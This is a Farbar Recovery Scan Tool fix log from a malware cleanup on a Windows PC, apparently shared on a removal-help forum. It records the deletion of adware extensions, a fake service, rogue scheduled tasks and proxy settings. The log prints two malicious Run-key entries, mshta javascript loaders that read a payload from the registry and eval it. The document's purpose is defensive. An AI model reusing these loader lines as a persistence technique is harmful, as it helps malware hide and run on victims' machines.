Fix result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01 Ran by Joe (2016-03-29 00:02:45) Run:2 Running from C:\Users\Joe\Downloads Loaded Profiles: Joe (Available Profiles: Joe) Boot Mode: Normal ============================================== fixlist content: ***************** CreateRestorePoint: HKLM-x32\...\Run: [**eeb9c5dc<*>] => mshta javascript:VyIZ9J1V="VOf";Z2V8=new%20ActiveXObject("WScript.Shell");uJ45fzMWmA="Fe";GAj7Y=Z2V8.RegRead("HKLM\\software\\Wow6432Node\\e09000bd53\\76676c3b");nk0ceuWpp="XRl";eval(GAj7Y);tgL5ndl="H (the data entry has 5 more characters). <===== ATTENTION (Value Name with invalid characters) HKLM\...\Policies\Explorer\Run: [**552f49b9<*>] => mshta javascript:mdDO90BSHt="Av";tr69=new%20ActiveXObject("WScript.Shell");Khb1nGB="LpdnVipZK3";AR2lR=tr69.RegRead("HKLM\\software\\Wow6432Node\\e09000bd53\\76676c3b");nubGY1N6K="1JadTvk";eval(AR2lR); (the data entry has 20 more characters). <===== ATTENTION (Value Name with invalid characters) Toolbar: HKU\S-1-5-21-3655023002-2648474569-3043735959-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File CHR Extension: (GGoSauve) - C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlabfejiidahciobclpfigdfpgfbedee [2014-09-25] CHR HKLM\...\Chrome\Extension: [pflphaooapbgpeakohlggbpidpppgdff] - C:\Users\Joe\AppData\Local\mysearchdial-speeddial.crx CHR HKU\S-1-5-21-3655023002-2648474569-3043735959-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pflphaooapbgpeakohlggbpidpppgdff] - C:\Users\Joe\AppData\Local\mysearchdial-speeddial.crx CHR HKLM-x32\...\Chrome\Extension: [debmkdhphjfcbaomiknnceliiclnpmfg] - C:\Program Files (x86)\Jump Flip\debmkdhphjfcbaomiknnceliiclnpmfg.crx CHR HKLM-x32\...\Chrome\Extension: [pflphaooapbgpeakohlggbpidpppgdff] - C:\Users\Joe\AppData\Local\mysearchdial-speeddial.crx R2 syshost32; C:\Windows\Installer\{673C08DA-2B79-E036-1E40-630AFC5BA90F}\syshost.exe [215477 2015-12-22] () [File not signed] 2016-03-28 16:53 - 2014-09-25 20:28 - 00000000 ____D C:\ProgramData\4675a9632c473f58 Task: {46CF61D3-A536-490F-A3A3-5C1787480CBC} - System32\Tasks\UpdaterEX => C:\Users\Joe\AppData\Roaming\UpdaterEX\UpdateProc\UpdateTask.exe [2013-04-12] () <==== ATTENTION C:\Users\Joe\AppData\Roaming\UpdaterEX Task: C:\Windows\Tasks\UpdaterEX.job => C:\Users\Joe\AppData\Roaming\UPDATE~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION C:\Windows\Installer\{673C08DA-2B79-E036-1E40-630AFC5BA90F} Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f Reg: reg delete HKLM\software\Wow6432Node\e09000bd53 cmd: sfc /scanfile=C:\Windows\system32\Drivers\volsnap.sys RemoveProxy: EmptyTemp: CMD: bitsadmin /reset /allusers ***************** Restore point was successfully created. HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\**eeb9c5dc<*> => value not found. HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\**552f49b9<*> => value not found. HKU\S-1-5-21-3655023002-2648474569-3043735959-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => value not found. HKCR\CLSID\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => key not found. C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlabfejiidahciobclpfigdfpgfbedee => not found HKLM\SOFTWARE\Google\Chrome\Extensions\pflphaooapbgpeakohlggbpidpppgdff => key not found. HKU\S-1-5-21-3655023002-2648474569-3043735959-1000\SOFTWARE\Google\Chrome\Extensions\pflphaooapbgpeakohlggbpidpppgdff => key not found. HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\debmkdhphjfcbaomiknnceliiclnpmfg => key not found. HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\pflphaooapbgpeakohlggbpidpppgdff => key not found. syshost32 => service not found. "C:\ProgramData\4675a9632c473f58" => not found. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{46CF61D3-A536-490F-A3A3-5C1787480CBC} => key not found. C:\Windows\System32\Tasks\UpdaterEX => not found. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UpdaterEX => key not found. "C:\Users\Joe\AppData\Roaming\UpdaterEX" => not found. C:\Windows\Tasks\UpdaterEX.job => not found. "C:\Windows\Installer\{673C08DA-2B79-E036-1E40-630AFC5BA90F}" => not found. ========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f ========= The operation completed successfully. ========= End of Reg: ========= ========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f ========= The operation completed successfully. ========= End of Reg: ========= ========= reg delete HKLM\software\Wow6432Node\e09000bd53 ========= Permanently delete the registry key HKEY_LOCAL_MACHINE\software\Wow6432Node\e09000bd53 (Yes/No)? ERROR: The system was unable to find the specified registry key or value. ========= End of Reg: ========= ========= sfc /scanfile=C:\Windows\system32\Drivers\volsnap.sys ========= Windows Resource Protection did not find any integrity violations. ========= End of CMD: ========= ========= RemoveProxy: ========= HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully HKU\S-1-5-21-3655023002-2648474569-3043735959-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully HKU\S-1-5-21-3655023002-2648474569-3043735959-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully ========= End of RemoveProxy: ========= ========= bitsadmin /reset /allusers ========= BITSADMIN version 3.0 [ 7.5.7600 ] BITS administration utility. (C) Copyright 2000-2006 Microsoft Corp. BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows. Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets. Unable to connect to BITS - 0x80070424 ========= End of CMD: ========= EmptyTemp: => 48.5 GB temporary data Removed. The system needed a reboot. ==== End of Fixlog 00:08:45 ====